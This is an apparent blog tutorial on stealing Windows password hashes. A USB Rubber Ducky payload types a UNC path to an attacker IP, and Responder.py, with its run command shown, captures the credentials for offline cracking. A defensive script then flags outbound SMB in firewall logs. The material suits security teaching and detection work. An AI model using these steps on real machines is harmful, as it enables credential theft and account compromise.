Capturing Hashes – Introduction
I spotted a tweet earlier this week from the Hak5 crew, makers of the USB Rubber Ducky. The tweet was based around capturing Windows hashes with a payload that sends an SMB request from the victim machine to your attack machine.
You can read Hak5’s original post about the topic here:
To get this working successfully, you will need the following:
- USB Rubber Ducky
- Generated Payload
- A server running Responder.py waiting to capture the hashes from the SMB request
Generating the Payload
Hak5 have a publicly available payload generator (Duck Toolkit), which produces a .bat file containing the malicious payload. It’s nice and easy: paste your payload into the generator, click ‘Generate Script’ and then select the file you wish to use (Inject.bin).
In the screenshot above, you can see how simple the payload really is.
- REM = Remarks (notes/instructions from the author)
- DELAY = Time to delay (1000 = 1 second)
- GUI r = Windows run GUI
- DELAY 100 = Delay 100ms
- STRING = The text entered into the Windows run GUI - \\<ATTACK IP ADDRESS>
- ENTER = OK
Place the .bin file onto the micro SD card and get ready to fire it up! But before you do, remember to start responder.py…
Server Running Responder.py
I personally have a cloud-hosted server for testing (Ubuntu). First, you have to git clone responder.py and then run responder.py as root:
sudo python responder.py -I eth0 -fvw
Now Responder is listening, waiting for them sweet, sweet hashes 😀
When you plug the Rubber Ducky USB into the victim’s machine it runs the payload within two seconds, which will look like this:
If they have allowed TCP:445 outbound, you will start to capture the victim’s login credentials and password hash.
You’re now ready to crack the hash offline! What are the chances the user has the same password for other accounts? Hmmmm!
There’s more mentioned on cracking hashes in one of my other posts – http://188.8.131.52/wifi-hacking/
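The capture described above only works when the victim machine is allowed to reach TCP 445 on a host outside the network, so that connection is the thing to look for and block. As an added example (not part of the original post, and not Hak5's or Responder's code), this script flags outbound SMB to non-internal addresses in a Windows Firewall log; the log lines, the addresses and the list of internal ranges are constructed assumptions.

```python
import ipaddress

# Assumption: "internal" means RFC 1918, loopback and link-local space.
# Adjust to the address plan of the network being monitored.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]

# Constructed sample in the Windows Firewall log (pfirewall.log) layout.
# Addresses are documentation ranges; none come from the original post.
SAMPLE_LOG = """\
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2024-01-15 09:12:01 ALLOW TCP 192.168.1.50 192.168.1.10 49712 445 0 - 0 0 0 - - - SEND
2024-01-15 09:12:07 ALLOW TCP 192.168.1.50 203.0.113.25 49713 445 0 - 0 0 0 - - - SEND
2024-01-15 09:12:09 ALLOW TCP 192.168.1.50 198.51.100.7 49714 443 0 - 0 0 0 - - - SEND
2024-01-15 09:12:15 DROP TCP 192.168.1.50 198.51.100.7 49715 445 0 - 0 0 0 - - - SEND
2024-01-15 09:12:20 ALLOW TCP 203.0.113.25 192.168.1.50 51000 445 0 - 0 0 0 - - - RECEIVE
"""

def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)

def find_external_smb(log_text, port=445):
    """Return outbound TCP/445 records whose destination is not internal."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names come from the log header
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        try:
            outbound = rec["path"] == "SEND"
            smb = rec["protocol"] == "TCP" and int(rec["dst-port"]) == port
            external = not is_internal(rec["dst-ip"])
        except (KeyError, ValueError):
            continue  # malformed or truncated record
        if outbound and smb and external:
            hits.append({k: rec[k] for k in ("date", "time", "action", "src-ip", "dst-ip")})
    return hits

if __name__ == "__main__":
    for hit in find_external_smb(SAMPLE_LOG):
        verdict = "blocked at host" if hit["action"] == "DROP" else "LEFT THE HOST"
        print(hit["date"], hit["time"], hit["src-ip"], "->", hit["dst-ip"], verdict)
```

Windows Firewall only writes ALLOW records when logging of successful connections is enabled for the active profile, so an empty result on a default configuration does not mean no such connection occurred.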